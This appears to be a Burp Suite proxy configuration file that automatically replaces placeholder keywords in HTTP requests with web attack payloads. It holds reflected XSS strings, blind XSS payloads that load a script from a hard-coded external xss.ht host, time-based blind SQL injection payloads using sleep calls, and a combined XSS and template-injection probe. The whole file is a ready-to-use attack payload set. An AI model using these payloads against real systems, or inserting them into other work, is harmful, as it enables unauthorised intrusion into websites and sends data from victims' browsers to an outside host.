- {
- "proxy": {
- "match_replace_rules": [
- {
- "comment": "FUZZ",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_param_value",
- "string_match": "FUZZ",
- "string_replace": "([^%22{%3C%27/\\`|%26`/\\%27%3E}%22^])"
- },
- {
- "comment": "FUZZ",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_header",
- "string_match": "FUZZ",
- "string_replace": "([^%22{%3C%27/\\`|%26`/\\%27%3E}%22^])"
- },
- {
- "comment": "FUZZ",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_body",
- "string_match": "FUZZ",
- "string_replace": "([^\"{<'/\\`|&`/\\'>}\"^])"
- },
- {
- "comment": "XSS/SQL",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_header",
- "string_match": "tryxss",
- "string_replace": "%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E"
- },
- {
- "comment": "XSS/SQL",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_body",
- "string_match": "tryxss",
- "string_replace": "'\"><img src=x onerror=alert(1)>"
- },
- {
- "comment": "XSS/SQL",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_param_value",
- "string_match": "tryxss",
- "string_replace": "%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E"
- },
- {
- "comment": "BLIND XSS (loads a script from a hard-coded external xss.ht host; callback data would go to that host)",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_body",
- "string_match": "bxss",
- "string_replace": "'\"><script src=\"https://saharah4xor1.xss.ht/\"></script><h1>"
- },
- {
- "comment": "BLIND XSS",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_param_value",
- "string_match": "bxss",
- "string_replace": "x%27%22%3E%3Cscript%20src=%22https://saharah4xor1.xss.ht/%22%3E%3C/script%3E"
- },
- {
- "comment": "BLIND XSS",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_header",
- "string_match": "bxss",
- "string_replace": "x%27%22%3E%3Cscript%20src=%22https://saharah4xor1.xss.ht/%22%3E%3C/script%3E"
- },
- {
- "comment": "Blind SQL",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_header",
- "string_match": "B-SQL",
- "string_replace": "+(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(12)))v)+'\"+(select(0)from(select(sleep(10)))v)+\"*/"
- },
- {
- "comment": "Blind SQL",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_body",
- "string_match": "B-SQL",
- "string_replace": "if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'\"XOR(if(now()=sysdate(),sleep(9),0))OR\"*/"
- },
- {
- "comment": "Blind SQL",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_param_value",
- "string_match": "B-SQL",
- "string_replace": "if(now()=sysdate(),sleep(9),0)/*%27XOR(if(now()=sysdate(),sleep(9),0))OR%27\"XOR(if(now()=sysdate(),sleep(9),0))OR\"*/"
- },
- {
- "comment": "Mixed Bugs",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_header",
- "string_match": "mixedbugs",
- "string_replace": "%27%22%3E%3Csvg%2Fonload%3Dalert()%3E%7B%7B7*7%7D%7D"
- },
- {
- "comment": "Mixed Bugs",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_body",
- "string_match": "mixedbugs",
- "string_replace": "'\"><svg/onload=alert()>{{7*7}}"
- },
- {
- "comment": "Mixed Bugs",
- "enabled": true,
- "is_simple_match": true,
- "rule_type": "request_param_value",
- "string_match": "mixedbugs",
- "string_replace": "%27%22%3E%3Csvg%2Fonload%3Dalert()%3E%7B%7B7*7%7D%7D"
- }
- ]
- }
- }